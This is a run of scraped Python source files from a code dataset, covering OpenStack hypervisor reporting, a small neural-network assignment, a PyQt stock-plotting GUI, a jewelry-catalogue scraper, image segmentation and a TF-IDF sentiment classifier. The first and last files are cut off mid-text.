isinstance(obj, dict):\r\n return sorted((k, deep_compare(v)) for k, v in obj.items())\r\n if isinstance(obj, list):\r\n return sorted(deep_compare(x) for x in obj)\r\n else:\r\n return obj\r\n\r\ndef doParseArgs(config):\r\n \"\"\"Parse args and return a config dict\"\"\"\r\n\r\n parser = argparse.ArgumentParser(description='Generate accounting records for OpenStack instances', epilog='-D and -A are mutually exclusive')\r\n parser.add_argument(\"-v\", \"--verbose\", help=\"output debugging information\", action=\"store_true\")\r\n parser.add_argument(\"-C\", \"--config-file\", help=\"Configuration file\")\r\n parser.add_argument(\"-o\", \"--outdir\", help=\"Output directory\")\r\n\r\n args = parser.parse_args()\r\n\r\n\r\n config['loglevel']=logging.CRITICAL\r\n config['config_file'] = '/path/to/config.conf'\r\n\r\n if args.config_file:\r\n config['config_file'] = args.config_file\r\n\r\n config['outdir'] = '.'\r\n if args.outdir:\r\n config['outdir'] = args.outdir\r\n\r\n if args.verbose:\r\n config['loglevel']=logging.INFO\r\n\r\n return config\r\n\r\ndef doReadConfig(config):\r\n try:\r\n f = open(config['config_file'], 'r')\r\n except IOError:\r\n return\r\n else:\r\n newconfig = json.load(f)\r\n config.update(newconfig)\r\n\r\ndef get_keystone_creds():\r\n d = {}\r\n d['OS_USERNAME'] = os.environ.get('OS_USERNAME')\r\n d['OS_PASSWORD'] = os.environ.get('OS_PASSWORD')\r\n d['OS_AUTH_URL'] = os.environ.get('OS_AUTH_URL')\r\n d['OS_PROJECT_NAME'] = os.environ.get('OS_PROJECT_NAME')\r\n d['OS_REGION_NAME'] = os.environ.get('OS_REGION_NAME')\r\n d['OS_PROJECT_DOMAIN_NAME'] = os.environ.get('OS_PROJECT_DOMAIN_NAME')\r\n d['OS_USER_DOMAIN_NAME'] = os.environ.get('OS_USER_DOMAIN_NAME')\r\n d['OS_IDENTITY_API_VERSION'] = os.environ.get('OS_IDENTITY_API_VERSION')\r\n d['OS_INTERFACE'] = os.environ.get('OS_INTERFACE')\r\n return d\r\n\r\ndef getData(config):\r\n auth=get_keystone_creds()\r\n\r\n loader = loading.get_plugin_loader('password')\r\n keystone = loader.load_from_options(auth_url=auth['OS_AUTH_URL'],\r\n username=auth['OS_USERNAME'],\r\n password=auth['OS_PASSWORD'],\r\n project_name=auth['OS_PROJECT_NAME'],\r\n user_domain_name=auth['OS_USER_DOMAIN_NAME'],\r\n project_domain_name=auth['OS_PROJECT_DOMAIN_NAME']\r\n )\r\n\r\n sess = session.Session(auth=keystone)\r\n nova = nova_client.Client(2.1, session=sess)\r\n\r\n hvs=[]\r\n hv_status={}\r\n\r\n for nc in nova.hypervisors.list(detailed=True):\r\n hv={}\r\n hv['id']=nc.id\r\n hv['hypervisor_hostname']=nc.hypervisor_hostname\r\n hv['vcpus']=nc.vcpus\r\n hv['memory_mb']=nc.memory_mb\r\n hvs.append(hv)\r\n\r\n hv_status['hypervisors']=hvs\r\n ts = datetime.datetime.utcnow().strftime(\"%Y-%m-%dT%H:%M:%SZ\")\r\n hv_status['ts']=ts\r\n return hv_status\r\n\r\ndef getLatestFacts(config):\r\n file_list = glob.glob(config['outdir'] + \"//hypervisor_facts_*.json\")\r\n\r\n if len(file_list) == 0:\r\n return {\"hypervisors\": []}\r\n\r\n newest = max(file_list, key=lambda d: datetime.datetime.strptime(d, \"{}/hypervisor_facts_%Y-%m-%dT%H:%M:%S.json\".format(config['outdir'])))\r\n\r\n f=open(newest, 'r')\r\n latest_facts=json.load(f)\r\n\r\n return latest_facts\r\n\r\ndef isNewData(config,data):\r\n latest_facts = getLatestFacts(config)\r\n if deep_compare(latest_facts['hypervisors']) == deep_compare(data['hypervisors']):\r\n logging.info(\"No new facts found\")\r\n return False\r\n else:\r\n logging.info(\"New facts found\")\r\n return True\r\n\r\ndef main ():\r\n\r\n config={}\r\n\r\n doParseArgs(config)\r\n doReadConfig(config)\r\n\r\n logging.basicConfig(\r\n format='%(asctime)s [%(levelname)s] %(message)s',\r\n datefmt='%Y-%m-%d %H:%M:%S',\r\n level=config['loglevel']\r\n )\r\n\r\n\r\n data = getData(config)\r\n\r\n if isNewData(config, data):\r\n nowtime = datetime.datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%S')\r\n json_out = \"{}/hypervisor_facts_{}.json\".format(config['outdir'], nowtime)\r\n with open(json_out, 'w') as outfile:\r\n json.dump(data, outfile, indent=2, sort_keys=True)\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"hypervisor_fact_reporting/hypervisor_facts.py","file_name":"hypervisor_facts.py","file_ext":"py","file_size_in_byte":4725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"538788885","text":"# -- coding: utf-8 --\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom testCases import *\nimport sklearn\nimport sklearn.datasets\nimport sklearn.linear_model\nfrom planar_utils import plot_decision_boundary, sigmoid, load_planar_dataset, load_extra_datasets\n\nX, Y = load_planar_dataset()\n\n\ndef show_datasets(X, Y):\n plt.title('flowers')\n plt.xlabel('x1')\n plt.ylabel('x2')\n plt.scatter(X[0, :], X[1, :], c = Y, s = 40, cmap = plt.cm.Spectral)\n plt.show()\n\n\ndef layer_sizes(X, Y):\n n_x = X.shape[0]\n n_h = 4\n n_y = Y.shape[0]\n \n return (n_x, n_h, n_y)\n\n\ndef initialize_parameters(n_x, n_h, n_y):\n W1 = np.random.randn(n_h, n_x) * 0.01\n b1 = np.zeros((n_h, 1))\n W2 = np.random.randn(n_y, n_h) * 0.01\n b2 = np.zeros((n_y, 1))\n parameters = {\"W1\": W1,\n \"b1\": b1,\n \"W2\": W2,\n \"b2\": b2}\n \n return parameters\n\n\ndef forward_propagation(X, parameters):\n W1 = parameters[\"W1\"]\n b1 = parameters[\"b1\"]\n W2 = parameters[\"W2\"]\n b2 = parameters[\"b2\"]\n\n Z1 = np.dot(W1, X) + b1\n A1 = np.tanh(Z1)\n Z2 = np.dot(W2, A1) + b2\n A2 = sigmoid(Z2)\n\n cache = {\"Z1\": Z1,\n \"A1\": A1,\n \"Z2\": Z2,\n \"A2\": A2}\n \n return A2, cache\n\n\ndef compute_cost(A2, Y):\n m = Y.shape[1]\n logprobs = Y * np.log(A2) + (1 - Y) * np.log(1 - A2)\n cost = -np.sum(logprobs) / m\n cost = np.squeeze(cost) #去掉数组中为1的维度,得到的cost最后就是一个值\n \n return cost\n\n\ndef backward_propagation(parameters, cache, X, Y):\n m = X.shape[1]\n W1 = parameters[\"W1\"]\n W2 = parameters[\"W2\"]\n\n A1 = cache[\"A1\"]\n A2 = cache[\"A2\"]\n\n dZ2 = A2 - Y\n dW2 = np.dot(dZ2, A1.T) / m\n db2 = np.sum(dZ2, axis=1, keepdims=True) / m\n dZ1 = np.dot(W2.T, dZ2) * (1 - np.power(A1, 2))\n dW1 = np.dot(dZ1, X.T) / m\n db1 = np.sum(dZ1, axis=1, keepdims=True) /m\n\n grads = {\"dW1\": dW1,\n \"db1\": db1,\n \"dW2\": dW2,\n \"db2\": db2}\n \n return grads\n\n\ndef update_parameters(parameters, grads, learning_rate = 1.2):\n W1 = parameters[\"W1\"]\n b1 = parameters[\"b1\"]\n W2 = parameters[\"W2\"]\n b2 = parameters[\"b2\"]\n\n dW1 = grads[\"dW1\"]\n db1 = grads[\"db1\"]\n dW2 = grads[\"dW2\"]\n db2 = grads[\"db2\"]\n\n W1 -= learning_rate * dW1\n b1 -= learning_rate * db1\n W2 -= learning_rate * dW2\n b2 -= learning_rate * db2\n\n parameters = {\"W1\": W1,\n \"b1\": b1,\n \"W2\": W2,\n \"b2\": b2}\n \n return parameters\n\n\ndef nn_model(X, Y, n_h, num_iterations = 10000, print_cost=False):\n n_x = layer_sizes(X, Y)[0]\n n_y = layer_sizes(X, Y)[2]\n\n parameters = initialize_parameters(n_x, n_h, n_y)\n W1 = parameters[\"W1\"]\n b1 = parameters[\"b1\"]\n W2 = parameters[\"W2\"]\n b2 = parameters[\"b2\"]\n\n for i in range(num_iterations):\n A2, cache = forward_propagation(X, parameters)\n cost = compute_cost(A2, Y)\n grads = backward_propagation(parameters, cache, X, Y)\n parameters = update_parameters(parameters, grads, learning_rate = 1.2)\n\n if print_cost and i % 1000 == 0:\n print (\"Cost after iteration %i: %f\" % (i, cost))\n \n return parameters\n\n\ndef predict(parameters, X):\n A2, cache = forward_propagation(X, parameters)\n predictions = np.around(A2) # 四舍五入,不用再使用loop\n\n return predictions\n\n\ndef accuracy():\n parameters = nn_model(X, Y, n_h = 4,\n num_iterations = 10000, \n print_cost = True)\n \n plot_decision_boundary(lambda x: predict(parameters, x.T), X, Y)\n plt.title(\"Decision Boundary for hidden layer size \" + str(4))\n plt.show()\n\n predictions = predict(parameters, X)\n accuracy = float((np.dot(Y, predictions.T) + \n np.dot(1 - Y,1 - predictions.T)) / float(Y.size) * 100)\n print ('Accuracy: %d' % accuracy + '%')\n return accuracy\n\n\n### test different hidden_layer_sizes\nplt.figure(figsize=(16, 32))\nhidden_layer_sizes = [1, 2, 3, 4, 5, 10, 20]\nfor i, n_h in enumerate(hidden_layer_sizes):\n plt.subplot(5, 2, i+1)\n plt.title('Hidden Layer of size %d' % n_h)\n parameters = nn_model(X, Y, n_h, num_iterations = 10000)\n plot_decision_boundary(lambda x: predict(parameters, x.T), X, Y)\n # plt.show()\n predictions = predict(parameters, X)\n accuracy = float((np.dot(Y,predictions.T) + np.dot(1-Y,1-predictions.T))/float(Y.size)*100)\n print (\"Accuracy for {} hidden units: {} %\".format(n_h, accuracy))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"assignment1-3/assignment1-3.py","file_name":"assignment1-3.py","file_ext":"py","file_size_in_byte":4601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"547671988","text":"import sys\nfrom matplotlib import style\nimport matplotlib.pyplot as plt\nfrom PyQt5.QtCore import QCoreApplication, pyqtSlot\nfrom PyQt5.QtGui import QIcon, QColor, QPainter\nfrom PyQt5.QtWidgets import QMessageBox, QAction, QApplication, QWidget, QPushButton, QMenuBar, QLineEdit, QFormLayout\nimport api_wrapper\n\nstyle.use('ggplot')\n\nclass MainWindow(QWidget):\n\n def __init__(self, x, y, width, height, title, icon=None):\n # Init for window\n super().__init__()\n self.setGeometry(x, y, width, height)\n self.setWindowTitle(title)\n if icon is not None:\n self.setWindowIcon(QIcon(icon))\n\n # Declare textboxes and menubar\n self.menubar = None\n self.api_box = None\n self.stock_box = None\n\n self.resp_data = None\n\n self.current_grabber = api_wrapper.TimeSeries()\n\n # Initialize the window elements\n self.init_menubar()\n self.init_textboxes()\n self.home()\n\n def init_menubar(self):\n # Create menubar buttons\n self.menubar = QMenuBar(self)\n file_menu = self.menubar.addMenu('&File')\n extract_action = QAction('&Quit', self)\n extract_action.setShortcut('Ctrl+W')\n extract_action.setStatusTip('Quit the app')\n extract_action.triggered.connect(QCoreApplication.instance().quit)\n file_menu.addAction(extract_action)\n about_menu = self.menubar.addMenu('&Help')\n extract_action = QAction('&About', self)\n about_menu.addAction(extract_action)\n\n def init_textboxes(self):\n button_layout = QFormLayout()\n\n self.api_box = QLineEdit(self)\n self.api_box.move(20, self.menubar.geometry().height()+20)\n self.api_box.resize(self.api_box.sizeHint())\n self.stock_box = QLineEdit(self)\n self.stock_box.move(\n 20,\n self.menubar.geometry().height()+40+self.api_box.geometry().height()\n )\n self.stock_box.resize(self.stock_box.sizeHint())\n\n btn = QPushButton('Fetch data', self)\n btn.clicked.connect(self.clicked)\n\n button_layout.addRow(\" \", None)\n button_layout.addRow(\"API Key\", self.api_box)\n button_layout.addRow(\"Stock Ticker\", self.stock_box)\n button_layout.addRow(btn)\n\n self.setLayout(button_layout)\n\n def home(self):\n btn = QPushButton('Quit', self)\n btn.clicked.connect(QCoreApplication.instance().quit)\n btn.resize(btn.sizeHint())\n btn.move(self.geometry().width()-btn.geometry().width(),\n self.geometry().height()-btn.geometry().height())\n self.show()\n\n @pyqtSlot()\n def clicked(self):\n \"\"\" activates when the fetch data button is clicked.\n\n todo:\n * elegant way to exclude certain columns in the result df\n \"\"\"\n self.current_grabber.set_api_key(self.api_box.text())\n try:\n self.resp_data = self.current_grabber.get_daily(self.stock_box.text())\n\n # Raise an exception if the received data is an error\n if isinstance(self.resp_data, dict):\n for key, val in self.resp_data.items():\n if 'Error' or 'Information' in key:\n raise api_wrapper.ResponseError(val)\n\n # Plot the data if it exists\n self.resp_data = self.resp_data.T\n exclude = ['5. volume']\n self.resp_data.ix[:, self.resp_data.columns.difference(exclude)].plot()\n plt.show()\n except api_wrapper.MissingApiKey:\n button_reply = QMessageBox.warning(self,\n 'Error',\n 'No API Key was provided',\n QMessageBox.Ok,\n QMessageBox.Ok)\n self.resp_data = None # reset the response data\n except api_wrapper.ResponseError as e:\n button_reply = QMessageBox.warning(self,\n 'Error',\n '{}'.format(e),\n QMessageBox.Ok,\n QMessageBox.Ok)\n self.resp_data = None # reset the response data\n\n\ndef run_gui(x, y, width, height, title, icon=None):\n app = QApplication(sys.argv)\n gui = MainWindow(x, y, width, height, title, icon)\n sys.exit(app.exec_())\n","sub_path":"src/window_elements/window.py","file_name":"window.py","file_ext":"py","file_size_in_byte":4477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"200703169","text":"# -*- coding: utf-8 -*-\n# author:lyh\n# datetime:2020/7/31 16:52\n\"\"\"\n88. 合并两个有序数组\n\n给你两个有序整数数组 nums1 和 nums2,请你将 nums2 合并到 nums1 中,使 nums1 成为一个有序数组。\n\n\n\n说明:\n\n 初始化 nums1 和 nums2 的元素数量分别为 m 和 n 。\n 你可以假设 nums1 有足够的空间(空间大小大于或等于 m + n)来保存 nums2 中的元素。\n\n\n\n示例:\n\n输入:\nnums1 = [1,2,3,0,0,0], m = 3\nnums2 = [2,5,6], n = 3\n\n输出: [1,2,2,3,5,6]\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n def merge(self, nums1: List[int], m: int, nums2: List[int], n: int) -> None:\n \"\"\"\n Do not return anything, modify nums1 in-place instead.\n \"\"\"\n m -= 1\n n -= 1\n for i in range(m + n + 1, -1, -1):\n if m >= 0 and n >= 0:\n if nums1[m] >= nums2[n]:\n nums1[i] = nums1[m]\n m -= 1\n else:\n nums1[i] = nums2[n]\n n -= 1\n elif n >= 0:\n nums1[i] = nums2[n]\n n -= 1\n else:\n break\n\n\nif __name__ == '__main__':\n nums1 = [1, 2, 3, 0, 0, 0]\n nums2 = [2, 5, 6]\n Solution().merge(nums1, 3, nums2, 3)\n print(nums1)\n","sub_path":"Solutions/0088.merge.easy.py","file_name":"0088.merge.easy.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"535302781","text":"import tensorflow as tf\nimport tensorflow.contrib.slim as slim\nimport numpy as np\nimport datetime\nimport config \nfrom sklearn.metrics import average_precision_score\nfrom sklearn.metrics import roc_auc_score\n\nFLAGS = tf.app.flags.FLAGS\n\ndata = np.load(FLAGS.data_dir)\nbatches = np.load(FLAGS.batches_dir)\nQ = np.load(FLAGS.Q_dir)\nQ_idx = np.load(FLAGS.Q_idx_dir)\n\nsample_indicator = np.load(FLAGS.sample_indicator_dir)\n\ndegree_of_freedom = np.load(FLAGS.degree_of_freedom_dir)\n\nrefined_sample_indicator = None \n#np.load(FLAGS.refined_sample_indicator_dir)\nrefined_shift_indicator = None \n#np.load(FLAGS.refined_shift_indicator_dir)\n\n_features = data\n_mean = np.mean(_features, axis=0)\n_std = np.std(_features, axis=0)\n#print(\"means:\", _mean)\n#print(\"stds:\", _std)\n\ndef get_data():\n return data, batches\n\ndef get_xrd_mat():\n return data[:,FLAGS.feature_dim:]\n\ndef get_comp():\n return data[:,:FLAGS.feature_dim]\n\ndef get_weights_sol():\n return np.load(FLAGS.weights_sol_dir)\n\ndef get_bases_sol():\n return np.load(FLAGS.bases_sol_dir)\n\ndef get_decomposition_sol():\n return np.load(FLAGS.decomposition_sol_dir)\n\ndef get_feature(data, my_order, offset = None):\n # we use (x - mean(x))/stderr as the normalization\n # we remove the lattice parameters and G6\n output = []\n if (offset == None):\n offset = 0\n \n for i in my_order:\n x = data[i][offset:offset + FLAGS.feature_dim]\n #x = (x - _mean)/_std\n output.append(x)\n\n output = np.array(output, dtype=\"float32\") \n return output\n\ndef get_xrd(data, my_order, offset = None):\n # we use max-normalization\n output = []\n if (offset == None):\n offset = FLAGS.feature_dim\n \n for i in my_order:\n x = data[i][offset:offset + FLAGS.xrd_dim]\n x = x[Q_idx]\n #x = x /(np.max(x) + FLAGS.eps)\n #x * FLAGS.peak_rescale #/(np.max(x) + 1e-9)\n output.append(x)\n\n output = np.array(output, dtype=\"float32\") \n return output\n\ndef get_indicator(my_order, flag = 0, offset = None):\n # we use (x - mean(x))/stderr as the normalization\n # we remove the lattice parameters and G6\n output = []\n rand_I = np.random.randint(2, size = FLAGS.n_bases + FLAGS.n_new_bases)\n for i in my_order:\n v = flag \n x = np.concatenate([sample_indicator[i][:FLAGS.n_bases], np.zeros(FLAGS.n_new_bases) + v])\n\n if (FLAGS.rand_I == 1):\n x *= rand_I\n #x = (x - _mean)/_std\n output.append(x)\n\n output = np.array(output, dtype=\"float32\") \n return output\n\ndef get_refined_sample_indicator(my_order, version = 1, offset = None):\n # we use (x - mean(x))/stderr as the normalization\n # we remove the lattice parameters and G6\n global refined_sample_indicator\n if (type(refined_sample_indicator) == type(None)):\n refined_sample_indicator = np.load(FLAGS.refined_sample_indicator_dir)\n\n output = []\n \n for i in my_order:\n if (version == 1):\n x = refined_sample_indicator[i][:FLAGS.n_bases + FLAGS.n_new_bases]\n #x = (x - _mean)/_std\n output.append(x)\n\n output = np.array(output, dtype=\"float32\") \n return output\n\ndef get_refined_shift_indicator(my_order, version = 1, offset = None):\n # we use (x - mean(x))/stderr as the normalization\n # we remove the lattice parameters and G6\n global refined_shift_indicator\n if (type(refined_shift_indicator) == type(None)):\n refined_shift_indicator = np.load(FLAGS.refined_shift_indicator_dir)\n output = []\n \n for i in my_order:\n if (version == 1):\n x = refined_shift_indicator[i]\n #x = (x - _mean)/_std\n output.append(x)\n\n output = np.array(output, dtype=\"float32\") \n return output\n\ndef get_degree_of_freedom(my_order, offset = None):\n # we use (x - mean(x))/stderr as the normalization\n # we remove the lattice parameters and G6\n output = []\n \n for i in my_order:\n x = degree_of_freedom[i]\n output.append(x)\n\n output = np.array(output, dtype=\"float32\") \n return output \n#####################################################################\n","sub_path":"Crystal-Structure-Phase-Mapping/Li-Sr-Al-powder-lib-38-50--fullQ-solu/get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":4150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"101364119","text":"from bs4 import BeautifulSoup as bs\nfrom multiprocessing import Pool\nfrom threading import Thread\nfrom concurrent import futures\nimport requests\nimport re\nimport os\n\"\"\"\nНа выходе хочу получить фото кольца в директории\nпроекта, название articul[number]\n\nчто нужно сделать\n1 - заходим на ссылку каждого кольца на странице сайта;\n\n2 - берем нужную информацию: цена, размер, если да,\nсохраняю( в названии артикул), нет, ищу дальше;\n\n3 - так делать каждый раз, пока не встречу ошибку 404-страницы кончились\n\n* Попробовать сделать многопоточную программу *\n\"\"\"\n\n\ndef information_about_ring(ring_url):\n try:\n ring_info = bs(requests.get(ring_url).content, 'html.parser')\n price = ring_info.find('span', attrs={\"class\": 'price'})['data-detail-price']\n article = ring_info.find('div', class_='product-article').string.strip().split(' ')[1]\n sizes = ring_info.findAll('button', {'class': 'size'})\n sizes = [float(i['data-size']) for i in sizes]\n image_url = ring_info.find('picture', attrs={'itemprop': 'image'})\n template = re.compile('https://+.*sokolov.*jpg')\n image_url = re.findall(template, str(image_url))[0]\n return price, article, sizes, image_url\n except: pass\n\n\ndef download_img(image_url, filename):\n img = requests.get(image_url)\n with open(r'F:\\py_Project\\SuddenlyNeeded\\jewelry\\ '.rstrip() + '{}.png'.format(filename), 'wb') as f:\n f.write(img.content)\n\n\ndef sort_rings(information_about_ring):\n price = float(information_about_ring[0])\n name = str(information_about_ring[1])\n necessary_size = list(filter(lambda x: x == 15.5, information_about_ring[2]))\n url = information_about_ring[3]\n if price < 3000 and necessary_size:\n download_img(url, name)\n print('All good!')\n\n\ndef informations_from_page(page_url):\n page_info = bs(requests.get(page_url).content, 'html.parser')\n rings = page_info.findAll('meta', attrs={'itemprop': 'sku'})\n template = 'https://sokolov.ru/jewelry-catalog/product/{}'\n rings_article = [template.format(ring['content']) for ring in rings]\n\n return rings_article\n\n\ndef make_all(ring):\n info = information_about_ring(ring)\n sort_rings(info)\n\n#start_ring_url = 'https://sokolov.ru/jewelry-catalog/product/94012455/'\n\nif __name__ == '__main__':\n for i in range(1, 52):\n page_url = 'https://sokolov.ru/jewelry-catalog/rings/silver/?page={}'.format(i)\n rings_article = informations_from_page(page_url)\n with futures.ThreadPoolExecutor(5) as executor:\n res = executor.map(make_all,rings_article )\n print(i)\n\n print('Finish!')","sub_path":"gift/rings_parser/rings_parse.py","file_name":"rings_parse.py","file_ext":"py","file_size_in_byte":2907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"653738878","text":"TC = int(input()) \nans = []\nfor tc in range(1, TC + 1):\n k = \"#\"+str(tc) + \" \"\n N = int(input())\n lst = list(map(int, input().strip().split()))\n s = sum(lst) / len(lst)\n count = 0\n for e in lst:\n if e <= s:\n count += 1\n k += str(count)\n ans.append(k)\nfor e in ans:\n print(e)","sub_path":"SW-10505.py","file_name":"SW-10505.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"15106079","text":"\"\"\"\nExtract pouch volume\n\"\"\"\n\nimport skimage.io as io\nimport matplotlib.pyplot as plt\nfrom skimage.measure import regionprops\nimport numpy as np\n\n# import nucleo_segment classes\nfrom storage.image import ImageHandler\nfrom processing.image import ImageProcessing\nfrom frontend.figures.plot import Plot\n\n# define directories\nwork_dir = '/Users/schiend/Desktop/Drive/Experiments/Carles/'\n\n# load image - Z, C, Y, X\npouch_img = io.imread(\n work_dir + 'vgQE-dsRed_mLamin-A488_wL3-L2_late_sync_25C.lif - Series066.tif'\n)\n\n# reorder axes - C, Z, Y, X\npouch_stack = pouch_img.swapaxes(0, 1)[0, 20:21:1, :, :]\n\nprocessing_steps = [\n ['EQU'],\n ['THR', 'OTSU', 100, 'no3D'], # checked\n ['MED', 1],\n ['ERO', 'bin', 5], # checked\n ['FILL'],\n ['OPN', 'bin', 2],\n ['CONV_BIT', 16, '3D'],\n ['LABEL', 1, 'no3D']\n]\n\ncheck_params = True\ndo_post_process = False\n\nresults_titles = list()\nresults_titles.append('Original')\npouch_volumes = list()\n\nif check_params is True:\n for i in range(10, 21, 1):\n processing_steps[5][2] = i\n pouch_volumes.append(ImageProcessing.apply_filters(processing_steps, pouch_stack, verbose=True))\n results_titles.append('OPN %i' % i)\nelse:\n pouch_volumes.append(ImageProcessing.apply_filters(processing_steps, pouch_stack, verbose=True))\n results_titles.append('Processed')\n\nif do_post_process is True:\n # go through labels and filter small ones\n pouch_volume_filtered = np.zeros_like(pouch_volumes[0])\n union_pouch_volume = np.zeros_like(pouch_volumes[0])\n dilate_step = [\n ['DIL', 'bin', 50]\n ]\n\n for z in range(0, pouch_volumes[0].shape[0]):\n print('get props for z: %i' % z)\n\n z_props = regionprops(pouch_volumes[0][z])\n\n # a list of dilated images\n dilated_imgs = list()\n\n # go through and filter by size\n for props in z_props:\n if props['area'] > 1000:\n # add to image\n dilated_imgs.append(np.zeros_like(union_pouch_volume[z]))\n\n for i, coords in enumerate(props['coords']):\n pouch_volume_filtered[z][int(coords[0]), int(coords[1])] = 1\n dilated_imgs[-1][int(coords[0]), int(coords[1])] = 1\n\n # dilate\n dilated_imgs[-1] = ImageProcessing.apply_filters(dilate_step, dilated_imgs[-1], verbose=True)\n\n print('calc union for %i dilated images' % len(dilated_imgs))\n\n # go through all dilated images and add union\n for o, dilated_outer in enumerate(dilated_imgs):\n for i, dilated_inner in enumerate(dilated_imgs):\n if o != i:\n union_pouch_volume[z] += np.logical_and(dilated_outer, dilated_inner)\n\n # add filtered and union to results\n pouch_volumes.append(pouch_volume_filtered)\n results_titles.append('Filtered')\n\n pouch_volumes.append(union_pouch_volume)\n results_titles.append('Union')\n\n # add union to filtered\n pouch_volume_final = pouch_volume_filtered + union_pouch_volume\n pouch_volume_final[pouch_volume_final > 1] = 1\n\n final_steps = [\n ['CLS', 'bin', 20],\n ['FILL']\n ]\n\n #for i in range(20, 41, 5):\n # final_steps[0][2] = i\n # pouch_volumes.append(ImageProcessing.apply_filters(final_steps, pouch_volume_final, verbose=True))\n # results_titles.append('CLS %i' % i)\n\n pouch_volume_final = ImageProcessing.apply_filters(final_steps, pouch_volume_final, verbose=True)\n pouch_volumes.append(pouch_volume_final)\n results_titles.append('Final')\n\n# show images\nstack_fig = plt.figure(figsize=(20, 10))\n\n# view the stack and the processing results\nresults = list()\n\nresults.append(pouch_stack)\n\nfor pouch_volume in pouch_volumes:\n results.append(pouch_volume)\n\nPlot.show_stacks(stack_fig, results, range(0, 1, 1), img_title=results_titles)\n\n#ImageHandler.save_stack_as_tiff(pouch_volume, work_dir + 'pouch_volume.tif')\n","sub_path":"playground/pouch_cross_r0.py","file_name":"pouch_cross_r0.py","file_ext":"py","file_size_in_byte":3958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"311557522","text":"import re\nimport pandas as pd\nimport numpy as np\nfrom nltk.corpus import stopwords\nfrom bs4 import BeautifulSoup\nfrom gensim.models import Word2Vec\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.feature_extraction.text import TfidfVectorizer as TFIDF\n\ntrain = pd.read_csv(\"./input/labeledTrainData.tsv\", header=0, delimiter=\"\\t\", quoting=3)\ntest = pd.read_csv(\"./input/testData.tsv\", header=0, delimiter=\"\\t\", quoting=3)\nunlabeled_train = pd.read_csv(\"./input/unlabeledTrainData.tsv\", header=0, delimiter=\"\\t\", quoting=3)\n\ndef review_to_words(raw_review):\n review_text = BeautifulSoup(raw_review, \"lxml\").get_text() \n letters_only = re.sub(\"[^a-zA-Z]\", \" \", review_text) \n words = letters_only.lower().split() \n stops = set(stopwords.words(\"english\")) \n meaningful_words = [w for w in words if not w in stops] \n return( \" \".join(meaningful_words))\n\nlabel = train['sentiment']\nclean_train_reviews = []\nnum_reviews = train[\"review\"].size\n\n\nfor i in range(0, num_reviews):\n if( (i+1)%1000 == 0 ):\n print(\"Review %d of %d\\n\" % (i+1, num_reviews))\n clean_train_reviews.append(review_to_words(train[\"review\"][i]))\n\nclean_test_reviews = [] \n\nfor i in range(0,num_reviews):\n if( (i+1) % 1000 == 0 ):\n print(\"Review %d of %d\\n\" % (i+1, num_reviews))\n clean_review = review_to_words(test[\"review\"][i])\n clean_test_reviews.append(clean_review)\n\ntfidf = TFIDF(min_df=2, # 最小支持度为2\n max_features=None,\n strip_accents='unicode',\n analyzer='word',\n token_pattern=r'\\w{1,}',\n ngram_range=(1, 3), # 二元文法模型\n use_idf=1,\n smooth_idf=1,\n sublinear_tf=1,\n stop_words = 'english')\n\n# 合并训练和测试集以便进行TFIDF向量化操作\ndata_all = clean_train_reviews + clean_test_reviews\nlen_train = len(clean_train_reviews)\n\ntfidf.fit(data_all)\ndata_all = tfidf.transform(data_all)\n# 恢复成训练集和测试集部分\ntrain_x = data_all[:len_train]\ntest_x = data_all[len_train:]\nprint('TF-IDF处理结束.')\n\nfrom sklearn.linear_model import LogisticRegression as LR\nfrom sklearn.grid_search import GridSearchCV\n\n# 设定grid search的参数\ngrid_values = {'C':[30]} \n# 设定打分为roc_auc\nmodel_LR = GridSearchCV(LR(penalty='l2', dual = True, random_state = 0), grid_values, scoring = 'roc_auc', cv = 20)\nmodel_LR.fit(train_x, label)\n\nGridSearchCV(cv=20, estimator=LR(C=1.0, class_weight=None, dual=True,\n fit_intercept=True, intercept_scaling=1, penalty='L2', random_state=0, tol=0.0001),\n fit_params={}, iid=True, n_jobs=1,\n param_grid={'C': [30]}, pre_dispatch='2*n_jobs', refit=True,\n scoring='roc_auc', verbose=0)\n#输出结果\nprint(model_LR.grid_scores_)\n\ntest_predicted = np.array(model_LR.predict(test_x))\nprint('保存结果...')\noutput = pd.DataFrame(data={\"id\":test[\"id\"], \"sentiment\":test_predicted})\noutput.to_csv('lr_output.csv', index=False, quoting=3)\nprint('结束.')","sub_path":"bag/lesson5.py","file_name":"lesson5.py","file_ext":"py","file_size_in_byte":3040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"214274662","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 7 09:23:24 2019\n\n@author: USUARIO\n\"\"\"\n\nimport re\nimport requests \nimport datetime\nfrom memmertTemporizador import RepeatedTimer as RPT\nfrom time import sleep\n\nDEBUG=True #True Simulate Only False Run\n \ndef dataMiner(URL,file):\n r = requests.get(URL)\n data = r.text\n dataArray=re.split(': |,',data)\n dateTimeObj=datetime.datetime.now()\n timestampStr = dateTimeObj.strftime(\"%d/%m/%Y %H:%M:%S.%f\")\n textDoc = open(file,'a')\n textDoc.write(\"%s %s\\n\"%(timestampStr,dataArray[1]))\n textDoc.close()\n print(dataArray[1])\n \n#------------------------------------------------------------------------------\nif(DEBUG): URL = 